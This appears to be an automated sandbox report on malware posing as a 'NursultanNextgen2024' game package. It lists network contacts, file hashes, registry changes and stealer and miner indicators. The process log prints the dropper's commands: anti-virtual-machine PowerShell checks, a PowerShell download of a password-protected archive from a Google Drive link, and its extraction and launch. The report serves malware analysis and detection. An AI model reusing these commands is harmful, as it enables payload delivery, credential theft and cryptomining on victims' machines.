| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 11.248.199.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 172.253.115.120:443 | csi.gstatic.com | tcp |
| US | 172.253.115.120:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | blobcomments-pa.clients6.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.115.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.206.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.1.100:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 100.1.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
Files
\??\pipe\crashpad_3896_USVQKOTDKSEYCDUY
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 777c895642904706c1c119759374a3e0 |
| SHA1 | 9fdd6f9733c5ee71b84a74ffdefee91ac9780d09 |
| SHA256 | ad81b42ca4830111f4b13ef2f29b91f1e7ace51ddab9056dfd84c64e68d17197 |
| SHA512 | ea49dc18b8219f8db42e3831703ae50aa0fffd80c1a0e1fa6a99b377dd1014842ebd8427b9f91b705b65b8f6b9543ee285492ce3647414d3bfadc939556c81dc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5af390c5172df390515185bf0d2c6712 |
| SHA1 | f18acde01b47480906da76c92eb2896ff062dad7 |
| SHA256 | e8211418ce96d9915c9cea6b3c4efb065aa69b5bb8231854e872196058a6b47b |
| SHA512 | 56cb1bb0840d00127c959ae9b07b4bcb68066765da4d8043b8b69f6b22738f7d9364a0990dcfddf5c3ae9a09f03672aed7a491831984f65e96365580c7143a03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0cc78e0c985d1a138db6cd1039019fba |
| SHA1 | 394a729c3dfc4a2a8ba7d508342f3681fd530169 |
| SHA256 | 78a96e4c865aad34d37d8711dfdf165760ebf7e35e2f5cf454e43e1da3fef2c7 |
| SHA512 | 29ba1bbdfc4618c3c3928f098ebb08a82ac67ab8558f79b96e5b18fe4b17f997967e0b4e239ff9626379994cea5f32561d1fd7991191ccf21b63936f2156dfa8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | fca679ee9ee6b7bb02d9661879f4b418 |
| SHA1 | f14ca76fb3f7bb985f01ce9ebb867ecca854d6c9 |
| SHA256 | 48b908a62f870be931962a754d35d9bba569b16edd1c77b0902065a9eb4cb03b |
| SHA512 | 59de552d499e94069cfc422e6ec8da4fabe7cae6f9a4fb856b17955d94efca21e45e15d37d7c3bfa6c5e2931d30fd2eff785bee6f6ed049ebd83b5f2d13dacec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5931b5.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\Desktop\NursultanNextgen2024\kdotlbBcbF.bat
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_504ku5as.uth.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\Cache.rar
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Windows\system32\drivers\etc\hosts
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
133s
Max time network
143s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (3) — копия"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240611-en
Max time kernel
129s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\049a3049a5ac8631a6c5f367b7d824fc0d8de39b
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
129s
Max time network
138s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1292 wrote to memory of 1684 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1292 wrote to memory of 1684 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1292 wrote to memory of 1684 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_opengl.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_opengl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
124s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\SAPIWrapper_x64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\jemalloc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
131s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240611-en
Max time kernel
122s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl_opengl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 25.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
150s
Max time network
118s
Command Line
Signatures
Phemedrone
xmrig
XMRig Miner payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\windows\powershell.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| N/A | N/A | C:\ProgramData\windows\powershell.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\windows\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 3828 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4668 set thread context of 4980 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\conhost.exe |
| PID 4668 set thread context of 2188 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\svchost.exe |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
